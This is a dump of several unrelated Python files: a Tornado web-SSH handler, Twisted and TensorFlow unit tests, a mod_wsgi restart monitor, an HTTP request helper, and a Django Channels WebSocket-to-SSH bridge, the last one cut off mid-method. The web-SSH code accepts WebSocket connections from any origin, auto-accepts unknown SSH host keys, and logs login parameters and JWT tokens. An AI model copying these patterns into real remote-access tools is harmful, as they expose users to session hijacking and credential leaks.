def get(self):
self.render('index.html')
# def is_ajax(self):
# if "application/json" in self.request.headers._as_list["Content-Type"][0]:
# return True
# return False
def get_host_info(self):
"""
cmdb api result: {"code":0,"msg":"","data":{"hostname":"192.168.1.2","port":22,"username":"root",
"password":"password","privatekey":null}}
:return:
"""
url = cmdb_api
logging.info('for cmdb get host, cmdb url: {0}, Request-ID: {1}'.format(url, self.settings['request_id']))
param = self.request.body.decode("utf-8")
param = json.loads(param)
result = requests.post(url=url, data=param, headers=cmdb_headers, timeout=3)
logging.info('request cmdb status: {}, data: {}, Request-ID: {}'.format(result.status_code, result.text, self.settings['request_id']))
json_data = result.json()
data = json_data["data"]
self.request.body_json = data
@tornado.gen.coroutine
@authenticated
def post(self):
worker_id = None
status = None
encoding = None
future = Future()
t = threading.Thread(target=self.ssh_connect_wrapped, args=(future,))
t.setDaemon(True)
t.start()
try:
worker = yield future
except Exception as exc:
status = str(exc)
else:
worker_id = worker.id
logging.info('worker id: {0}, Request-ID: {1}'.format(worker_id, self.settings['request_id']))
workers[worker_id] = worker
self.loop.call_later(DELAY, recycle_worker, worker)
encoding = worker.encoding
self.write(dict(id=worker_id, status=status, encoding=encoding))
class WsockHandler(MixinHandler, tornado.websocket.WebSocketHandler):
def initialize(self, loop):
self.loop = loop
self.worker_ref = None
def check_origin(self, origin):
return True
def get_client_addr(self):
return self.get_real_client_addr() or self.stream.socket.getpeername()
def open(self):
self.src_addr = self.get_client_addr()
logging.info('Connected from {}:{}'.format(*self.src_addr))
worker = workers.get(self.get_argument('id'))
if worker and worker.src_addr[0] == self.src_addr[0]:
workers.pop(worker.id)
self.set_nodelay(True)
worker.set_handler(self)
self.worker_ref = weakref.ref(worker)
self.loop.add_handler(worker.fd, worker, IOLoop.READ)
else:
self.close(reason='Websocket authentication failed.')
def on_message(self, message):
logging.debug('{!r} from {}:{}'.format(message, *self.src_addr))
worker = self.worker_ref()
try:
msg = json.loads(message)
except JSONDecodeError:
return
if not isinstance(msg, dict):
return
resize = msg.get('resize')
if resize and len(resize) == 2:
try:
worker.chan.resize_pty(*resize)
except (TypeError, struct.error, paramiko.SSHException):
pass
data = msg.get('data')
if data and isinstance(data, basestring_type):
worker.data_to_dst.append(data)
worker.on_write()
def on_close(self):
logging.info('Disconnected from {}:{}'.format(*self.src_addr))
worker = self.worker_ref() if self.worker_ref else None
if worker:
if self.close_reason is None:
self.close_reason = 'client disconnected'
worker.close(reason=self.close_reason)
class AuthXsrfHandler(MixinHandler, MixinRequestHandler):
def initialize(self, loop):
self.loop = loop
def options(self, *args, **kwargs):
self.write('success')
def post(self, *args, **kwargs):
if self.is_ajax():
param = self.request.body.decode("utf-8")
param = json.loads(param)
logging.info('Auth info: {0}, Request-ID: {1}'.format(param, self.settings['request_id']))
if user_auth(data=param):
logging.info('Auth successful, Request-ID: {}'.format(self.settings['request_id']))
encoded = jwt_encode(data=param)
logging.debug('Token: {0}, Request-ID: {1}'.format(encoded, self.settings['request_id']))
self.write(dict(code=0, status='success', data='{0}'.format(encoded)))
else:
logging.info('Auth Failed, Request-ID: {}'.format(self.settings['request_id']))
self.write(dict(code=1, status='username or password is error', data=''))
else:
logging.error('request type is error, Request-ID: {}'.format(self.settings['request_id']))
self.write(dict(code=2, status='request type error', data=''))
|
test_threadworker.py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted._threads._threadworker}.
"""
import gc
import weakref
from twisted.trial.unittest import SynchronousTestCase
from threading import ThreadError, local
from .. import ThreadWorker, LockWorker, AlreadyQuit
class FakeQueueEmpty(Exception):
"""
L{FakeQueue}'s C{get} has exhausted the queue.
"""
class WouldDeadlock(Exception):
"""
If this were a real lock, you'd be deadlocked because the lock would be
double-acquired.
"""
class FakeThread:
"""
A fake L{threading.Thread}.
@ivar target: A target function to run.
@type target: L{callable}
@ivar started: Has this thread been started?
@type started: L{bool}
"""
def __init__(self, target):
"""
Create a L{FakeThread} with a target.
"""
self.target = target
self.started = False
def start(self):
"""
Set the "started" flag.
"""
self.started = True
class FakeQueue:
"""
A fake L{Queue} implementing C{put} and C{get}.
@ivar items: A lit of items placed by C{put} but not yet retrieved by
C{get}.
@type items: L{list}
"""
def __init__(self):
"""
Create a L{FakeQueue}.
"""
self.items = []
def put(self, item):
"""
Put an item into the queue for later retrieval by L{FakeQueue.get}.
@param item: any object
"""
self.items.append(item)
def get(self):
"""
Get an item.
@return: an item previously put by C{put}.
"""
if not self.items:
raise FakeQueueEmpty()
return self.items.pop(0)
class FakeLock:
"""
A stand-in for L{threading.Lock}.
@ivar acquired: Whether this lock is presently acquired.
"""
def __init__(self):
"""
Create a lock in the un-acquired state.
"""
self.acquired = False
def acquire(self):
"""
Acquire the lock. Raise an exception if the lock is already acquired.
"""
if self.acquired:
raise WouldDeadlock()
self.acquired = True
def release(self):
"""
Release the lock. Raise an exception if the lock is not presently
acquired.
"""
if not self.acquired:
raise ThreadError()
self.acquired = False
class ThreadWorkerTests(SynchronousTestCase):
"""
Tests for L{ThreadWorker}.
"""
def setUp(self):
"""
Create a worker with fake threads.
"""
self.fakeThreads = []
self.fakeQueue = FakeQueue()
def startThread(target):
newThread = FakeThread(target=target)
newThread.start()
self.fakeThreads.append(newThread)
return newThread
self.worker = ThreadWorker(startThread, self.fakeQueue)
def test_startsThreadAndPerformsWork(self):
"""
L{ThreadWorker} calls its C{createThread} callable to create a thread,
its C{createQueue} callable to create a queue, and then the thread's
target pulls work from that queue.
"""
self.assertEqual(len(self.fakeThreads), 1)
self.assertEqual(self.fakeThreads[0].started, True)
def doIt():
doIt.done = True
doIt.done = False
self.worker.do(doIt)
self.assertEqual(doIt.done, False)
self.assertRaises(FakeQueueEmpty, self.fakeThreads[0].target)
self.assertEqual(doIt.done, True)
def test_quitPreventsFutureCalls(self):
"""
L{ThreadWorker.quit} causes future calls to L{ThreadWorker.do} and
L{ThreadWorker.quit} to raise L{AlreadyQuit}.
"""
self.worker.quit()
self.assertRaises(AlreadyQuit, self.worker.quit)
self.assertRaises(AlreadyQuit, self.worker.do, list)
class LockWorkerTests(SynchronousTestCase):
"""
Tests for L{LockWorker}.
"""
def test_fakeDeadlock(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
deadlock.
"""
lock = FakeLock()
lock.acquire()
self.assertRaises(WouldDeadlock, lock.acquire)
def test_fakeDoubleRelease(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
double-release.
"""
lock = FakeLock()
self.assertRaises(ThreadError, lock.release)
lock.acquire()
self.assertEqual(None, lock.release())
self.assertRaises(ThreadError, lock.release)
def test_doExecutesImmediatelyWithLock(self):
"""
L{LockWorker.do} immediately performs the work it's given, while the
lock is acquired.
"""
storage = local()
lock = FakeLock()
worker = LockWorker(lock, storage)
def work():
work.done = True
work.acquired = lock.acquired
work.done = False
worker.do(work)
self.assertEqual(work.done, True)
self.assertEqual(work.acquired, True)
self.assertEqual(lock.acquired, False)
def test_doUnwindsReentrancy(self):
"""
If L{LockWorker.do} is called recursively, it postpones the inner call
until the outer one is complete.
"""
lock = FakeLock()
worker = LockWorker(lock, local())
levels = []
acquired = []
def work():
work.level += 1
levels.append(work.level)
acquired.append(lock.acquired)
if len(levels) < 2:
worker.do(work)
work.level -= 1
work.level = 0
worker.do(work)
self.assertEqual(levels, [1, 1])
self.assertEqual(acquired, [True, True])
def test_quit(self):
"""
L{LockWorker.quit} frees the resources associated with its lock and
causes further calls to C{do} and C{quit} to fail.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
lock = None
self.assertIsNot(ref(), None)
worker.quit()
gc.collect()
self.assertIs(ref(), None)
self.assertRaises(AlreadyQuit, worker.quit)
self.assertRaises(AlreadyQuit, worker.do, list)
def test_quitWhileWorking(self):
"""
If L{LockWorker.quit} is invoked during a call to L{LockWorker.do}, all
recursive work scheduled with L{LockWorker.do} will be completed and
the lock will be released.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
def phase1():
worker.do(phase2)
worker.quit()
self.assertRaises(AlreadyQuit, worker.do, list)
phase1.complete = True
phase1.complete = False
def phase2():
phase2.complete = True
phase2.acquired = lock.acquired
phase2.complete = False
worker.do(phase1)
self.assertEqual(phase1.complete, True)
self.assertEqual(phase2.complete, True)
self.assertEqual(lock.acquired, False)
lock = None
gc.collect()
self.assertIs(ref(), None)
def test_quitWhileGettingLock(self):
"""
If L{LockWorker.do} is called concurrently with L{LockWorker.quit}, and
C{quit} wins the race before C{do} gets the lock attribute, then
L{AlreadyQuit} will be raised.
"""
class RacyLockWorker(LockWorker):
@property
def _lock(self):
self.quit()
return self.__dict__['_lock']
@_lock.setter
def _lock(self, value):
self.__dict__['_lock'] = value
worker = RacyLockWorker(FakeLock(), local())
self.assertRaises(AlreadyQuit, worker.do, list)
|
wsgi_restart.py
|
# This code lifted from the mod_wsgi docs.
import os
import sys
import signal
import threading
import atexit
import Queue
_interval = 1.0
_times = {}
_files = []
_running = False
_queue = Queue.Queue()
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Change detected to \'%s\'.' % (prefix, path)
print >> sys.stderr, '%s Triggering process restart.' % prefix
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
# If path doesn't denote a file and were previously
# tracking it, then it has been removed or the file type
# has changed so force a restart. If not previously
# tracking the file then we can ignore it as probably
# pseudo reference such as when file extracted from a
# collection of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
except Exception:
# If any exception occured, likely that file has been
# been removed just before stat(), so force a restart.
return True
return False
def _monitor():
while 1:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except Exception:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except Exception:
pass
_thread.join()
atexit.register(_exiting)
def track(path):
if path not in _files:
_files.append(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
_lock.acquire()
if not _running:
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Starting change monitor.' % prefix
_running = True
_thread.start()
|
request.py
|
from response import LazyResponse
from parser import Parser
from threading import Thread
from multiprocessing import Pipe
class Request(object):
"""
HTTP request.
"""
def __init__(self, config):
"""
Initialize an HTTP request instance for a given configuration.
"""
self.config = config
def __call__(self, **kwargs):
"""
Perform the request
The optional payload argument is sent to the server.
"""
if (not self.config.is_async):
return self._process_flow(kwargs)
else:
return self._process_async_flow(kwargs)
def _process_flow(self, payload):
"""
Put payload environment and start the chain.
"""
env = {}
if payload:
env = {'payload': payload}
procs = list(self.config.processors)
return Parser(procs).follow(self.config, env)
def _process_async_flow(self, payload):
"""
Starts an async chain.
"""
self.config.pipe, child_pipe = Pipe()
def handle_async():
if self.config.is_async and self.config.callback is None:
self._process_flow(payload=payload)
else:
self.config.callback(self._process_flow(payload=payload), \
*self.config.callback_args)
self._start_new_thread(handle_async)
return LazyResponse(child_pipe)
def _start_new_thread(self, target):
thread = Thread(target=target)
thread.start()
|
dumping_wrapper_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit Tests for classes in dumping_wrapper.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import shutil
import tempfile
import threading
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import dumping_wrapper
from tensorflow.python.debug.wrappers import framework
from tensorflow.python.debug.wrappers import hooks
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
from tensorflow.python.training import monitored_session
@test_util.run_v1_only("b/120545219")
class DumpingDebugWrapperSessionTest(test_util.TensorFlowTestCase):
def setUp(self):
self.session_root = tempfile.mkdtemp()
with test_util.device(use_gpu=False):
self.v = variables.VariableV1(10.0, dtype=dtypes.float32, name="v")
self.delta = constant_op.constant(1.0, dtype=dtypes.float32, name="delta")
self.eta = constant_op.constant(-1.4, dtype=dtypes.float32, name="eta")
self.inc_v = state_ops.assign_add(self.v, self.delta, name="inc_v")
self.dec_v = state_ops.assign_add(self.v, self.eta, name="dec_v")
self.ph = array_ops.placeholder(dtypes.float32, shape=(), name="ph")
self.inc_w_ph = state_ops.assign_add(self.v, self.ph, name="inc_w_ph")
self.sess = session.Session()
self.sess.run(self.v.initializer)
def tearDown(self):
ops.reset_default_graph()
if os.path.isdir(self.session_root):
shutil.rmtree(self.session_root)
def _assert_correct_run_subdir_naming(self, run_subdir):
self.assertStartsWith(run_subdir, "run_")
self.assertEqual(2, run_subdir.count("_"))
self.assertGreater(int(run_subdir.split("_")[1]), 0)
def testConstructWrapperWithExistingNonEmptyRootDirRaisesException(self):
dir_path = os.path.join(self.session_root, "foo")
os.mkdir(dir_path)
self.assertTrue(os.path.isdir(dir_path))
with self.assertRaisesRegexp(
ValueError, "session_root path points to a non-empty directory"):
dumping_wrapper.DumpingDebugWrapperSession(
session.Session(), session_root=self.session_root, log_usage=False)
def testConstructWrapperWithExistingFileDumpRootRaisesException(self):
file_path = os.path.join(self.session_root, "foo")
open(file_path, "a").close() # Create the file
self.assertTrue(gfile.Exists(file_path))
self.assertFalse(gfile.IsDirectory(file_path))
with self.assertRaisesRegexp(ValueError,
"session_root path points to a file"):
dumping_wrapper.DumpingDebugWrapperSession(
session.Session(), session_root=file_path, log_usage=False)
def testConstructWrapperWithNonexistentSessionRootCreatesDirectory(self):
new_dir_path = os.path.join(tempfile.mkdtemp(), "new_dir")
dumping_wrapper.DumpingDebugWrapperSession(
session.Session(), session_root=new_dir_path, log_usage=False)
self.assertTrue(gfile.IsDirectory(new_dir_path))
# Cleanup.
gfile.DeleteRecursively(new_dir_path)
def testDumpingOnASingleRunWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
self._assert_correct_run_subdir_naming(os.path.basename(dump_dirs[0]))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingOnASingleRunWorksWithRelativePathForDebugDumpDir(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
cwd = os.getcwd()
try:
os.chdir(self.session_root)
dump = debug_data.DebugDumpDir(
os.path.relpath(dump_dirs[0], self.session_root))
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
finally:
os.chdir(cwd)
def testDumpingOnASingleRunWithFeedDictWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
feed_dict = {self.ph: 3.2}
sess.run(self.inc_w_ph, feed_dict=feed_dict)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
self._assert_correct_run_subdir_naming(os.path.basename(dump_dirs[0]))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_w_ph), dump.run_fetches_info)
self.assertEqual(repr(feed_dict.keys()), dump.run_feed_keys_info)
def testDumpingOnMultipleRunsWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
for _ in range(3):
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(3, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
self.assertAllClose([10.0 + 1.0 * i],
dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testUsingNonCallableAsWatchFnRaisesTypeError(self):
bad_watch_fn = "bad_watch_fn"
with self.assertRaisesRegexp(TypeError, "watch_fn is not callable"):
dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=bad_watch_fn,
log_usage=False)
def testDumpingWithLegacyWatchFnOnFetchesWorks(self):
"""Use a watch_fn that returns different whitelists for different runs."""
def watch_fn(fetches, feeds):
del feeds
# A watch_fn that picks fetch name.
if fetches.name == "inc_v:0":
# If inc_v, watch everything.
return "DebugIdentity", r".*", r".*"
else:
# If dec_v, watch nothing.
return "DebugIdentity", r"$^", r"$^"
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=watch_fn,
log_usage=False)
for _ in range(3):
sess.run(self.inc_v)
sess.run(self.dec_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(6, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
if i % 2 == 0:
self.assertGreater(dump.size, 0)
self.assertAllClose([10.0 - 0.4 * (i / 2)],
dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
else:
self.assertEqual(0, dump.size)
self.assertEqual(repr(self.dec_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingWithLegacyWatchFnWithNonDefaultDebugOpsWorks(self):
"""Use a watch_fn that specifies non-default debug ops."""
def watch_fn(fetches, feeds):
del fetches, feeds
return ["DebugIdentity", "DebugNumericSummary"], r".*", r".*"
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=watch_fn,
log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(14,
len(dump.get_tensors("v", 0, "DebugNumericSummary")[0]))
def testDumpingWithWatchFnWithNonDefaultDebugOpsWorks(self):
"""Use a watch_fn that specifies non-default debug ops."""
def watch_fn(fetches, feeds):
del fetches, feeds
return framework.WatchOptions(
debug_ops=["DebugIdentity", "DebugNumericSummary"],
node_name_regex_whitelist=r"^v.*",
op_type_regex_whitelist=r".*",
tensor_dtype_regex_whitelist=".*_ref")
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=watch_fn,
log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(14,
len(dump.get_tensors("v", 0, "DebugNumericSummary")[0]))
dumped_nodes = [dump.node_name for dump in dump.dumped_tensor_data]
self.assertNotIn("inc_v", dumped_nodes)
self.assertNotIn("delta", dumped_nodes)
def testDumpingDebugHookWithoutWatchFnWorks(self):
dumping_hook = hooks.DumpingDebugHook(self.session_root, log_usage=False)
mon_sess = monitored_session._HookedSession(self.sess, [dumping_hook])
mon_sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
self._assert_correct_run_subdir_naming(os.path.basename(dump_dirs[0]))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingDebugHookWithStatefulWatchFnWorks(self):
watch_fn_state = {"run_counter": 0}
def counting_watch_fn(fetches, feed_dict):
del fetches, feed_dict
watch_fn_state["run_counter"] += 1
if watch_fn_state["run_counter"] % 2 == 1:
# If odd-index run (1-based), watch every ref-type tensor.
return framework.WatchOptions(
debug_ops="DebugIdentity",
tensor_dtype_regex_whitelist=".*_ref")
else:
# If even-index run, watch nothing.
return framework.WatchOptions(
debug_ops="DebugIdentity",
node_name_regex_whitelist=r"^$",
op_type_regex_whitelist=r"^$")
dumping_hook = hooks.DumpingDebugHook(
self.session_root, watch_fn=counting_watch_fn, log_usage=False)
mon_sess = monitored_session._HookedSession(self.sess, [dumping_hook])
for _ in range(4):
mon_sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(4, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
if i % 2 == 0:
self.assertAllClose([10.0 + 1.0 * i],
dump.get_tensors("v", 0, "DebugIdentity"))
self.assertNotIn("delta",
[datum.node_name for datum in dump.dumped_tensor_data])
else:
self.assertEqual(0, dump.size)
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingDebugHookWithStatefulLegacyWatchFnWorks(self):
watch_fn_state = {"run_counter": 0}
def counting_watch_fn(fetches, feed_dict):
del fetches, feed_dict
watch_fn_state["run_counter"] += 1
if watch_fn_state["run_counter"] % 2 == 1:
# If odd-index run (1-based), watch everything.
return "DebugIdentity", r".*", r".*"
else:
# If even-index run, watch nothing.
return "DebugIdentity", r"$^", r"$^"
dumping_hook = hooks.DumpingDebugHook(
self.session_root, watch_fn=counting_watch_fn, log_usage=False)
mon_sess = monitored_session._HookedSession(self.sess, [dumping_hook])
for _ in range(4):
mon_sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(4, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
if i % 2 == 0:
self.assertAllClose([10.0 + 1.0 * i],
dump.get_tensors("v", 0, "DebugIdentity"))
else:
self.assertEqual(0, dump.size)
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingFromMultipleThreadsObeysThreadNameFilter(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False,
thread_name_filter=r"MainThread$")
self.assertAllClose(1.0, sess.run(self.delta))
child_thread_result = []
def child_thread_job():
child_thread_result.append(sess.run(self.eta))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
thread.join()
self.assertAllClose([-1.4], child_thread_result)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertEqual(1, dump.size)
self.assertEqual("delta", dump.dumped_tensor_data[0].node_name)
def testDumpingWrapperWithEmptyFetchWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
sess.run([])
if __name__ == "__main__":
googletest.main()
|
consumers.py
|
from asgiref.sync import async_to_sync
from channels.generic.websocket import WebsocketConsumer, AsyncWebsocketConsumer
import json
import base64
from django.http.request import QueryDict
import paramiko
import socket
from threading import Thread
import time
import os
from django.utils.six import StringIO
from django.conf import settings
from .models import Host
def get_key_obj(pkeyobj, pkey_file=None, pkey_obj=None, password=None):
if pkey_file:
with open(pkey_file) as fo:
try:
pkey = pkeyobj.from_private_key(fo, password=password)
return pkey
except:
pass
else:
try:
pkey = pkeyobj.from_private_key(pkey_obj, password=password)
return pkey
except:
pkey_obj.seek(0)
class SSHBridge(object):
"""
桥接WebSocket和ssh
参考:https://blog.51cto.com/hongchen99/2336087
"""
def __init__(self, websocket, simpleuser):
self.websocket = websocket
self.simpleuser = simpleuser
def connect(self, host, user, pwd=None, key=None, port=22, timeout=6, term='xterm', pty_width=80, pty_height=24):
"""
建立SSH连接,放在 self.ssh_channel 通道中,之后直接在通道中交互数据
:param host:
:param user:
:param pwd:
:param key:
:param port:
:param timeout:
:param term:
:param pty_width:
:param pty_height:
:return:
"""
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
if key:
# 密钥方式认证
pkey = get_key_obj(paramiko.RSAKey, pkey_obj=key, password=pwd) or \
get_key_obj(paramiko.DSSKey, pkey_obj=key, password=pwd) or \
get_key_obj(paramiko.ECDSAKey, pkey_obj=key, password=pwd) or \
get_key_obj(paramiko.Ed25519Key,
pkey_obj=key, password=pwd)
ssh_client.connect(username=user, hostname=host,
port=port, pkey=pkey, timeout=timeout)
else:
ssh_client.connect(hostname=host, port=port,
username=user, password=pwd, timeout=timeout)
except Exception as e:
# print(e)
message = json.dumps({'flag': 'fail', 'message': str(e)})
self.websocket.send_message_or_team(message)
return
transport = ssh_client.get_transport()
"""
另一种方式建立通道
transport = paramiko.Transport((host, port,))
transport.start_client()
transport.auth_password(username=user, password=pwd)
"""
# 打开一个通道
self.ssh_channel = transport.open_session()
# 获取一个终端
self.ssh_channel.get_pty(term=term, width=pty_width, height=pty_height)
# 激活终端,这样就可以登录到终端了,就和我们用类似于xshell登录系统一样
self.ssh_channel.invoke_shell()
# 获取ssh连接主机后的返回内容,例如Linux,会显示上次登录等信息,把这些信息通过WebSocket显示到Web终端。
# 连接建立一次,之后交互数据不会再进入该方法
for i in range(2):
recv = self.ssh_channel.recv(1024).decode('utf-8')
message = json.dumps({'flag': 'msg', 'message': recv})
# print('【WS --websocket--> Web】建立SSH通道后,返回欢迎信息:', message)
self.websocket.send_message_or_team(message)
def close(self):
message = {'flag': 0, 'message': '关闭WebSocket和SSH连接'}
# 向WebSocket发送一个关闭消息
self.websocket.send_message_or_team(json.dumps(message))
try:
# 关闭ssh通道
self.ssh_channel.close()
# 关闭WebSocket连接
self.websocket.close()
except BaseException as e:
# print('关闭WebSocket和SSH连接产生异常:', e)
pass
def _ws_to_ssh(self, data):
"""
尝试发送数据到ssh通道,产生异常则关闭所有连接
"""
try:
# print('【Func --paramiko--> SSH】WebSocket中的数据发送数据到ssh通道:', data)
self.ssh_channel.send(data)
except OSError as e:
# print(e)
self.close()
def _ssh_to_ws(self):
try:
# while True:
while not self.ssh_channel.exit_status_ready():
data = self.ssh_channel.recv(1024).decode('utf-8')
# print('【SSH --paramiko--> Func】获取ssh通道返回的数据:', data)
if len(data) != 0:
message = {'flag': 'msg', 'message': data}
# print('【WS --websocket--> Web】通过WebSocket把信息发回前端,显示到Web终端:', message)
self.websocket.send_message_or_team(json.dumps(message))
else:
break
except:
self.close()
def shell(self, data):
Thread(target=self._ws_to_ssh, args=(data,)).start()
Thread(target=self._ssh_to_ws).start()
"""
t1 = Thread(target=self._ws_to_ssh, args=(data,))
t1.setDaemon(True)
t1.start()
t2 = Thread(target=self._ssh_to_ws)
t2.setDaemon(True)
t2.start()
"""
def resize_pty(self, cols, rows):
self.ssh_channel.resize_pty(width=cols, height=rows)
class WebsshConsumer(WebsocketConsumer):
"""
1、xterm.js 在浏览器端模拟 shell 终端, 监听用户输入通过 websocket 将用户输入的内容上传到 django
2、django 接受到用户上传的内容, 将用户在前端页面输入的内容通过 paramiko 建立的 ssh 通道上传到远程服务器执行
3、paramiko 将远程服务器的处理结果返回给 django
4、django 将 paramiko 返回的结果通过 websocket 返回给用户
5、xterm.js 接收 django 返回的数据并将其写入前端页面
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.host_id = ''
self.simple_user = ''
self.is_team = False
self.team_name = ''
def connect(self):
"""
建立WebSocket连接,并实例化SSHBridge类,在这个对象中建立SSH连接,放在 self.ssh_channel 通道中
:return:
"""
self.host_id = self.scope['url_route']['kwargs'].get('host_id')
# 获取session中的值
self.simple_user = self.scope["user"].username
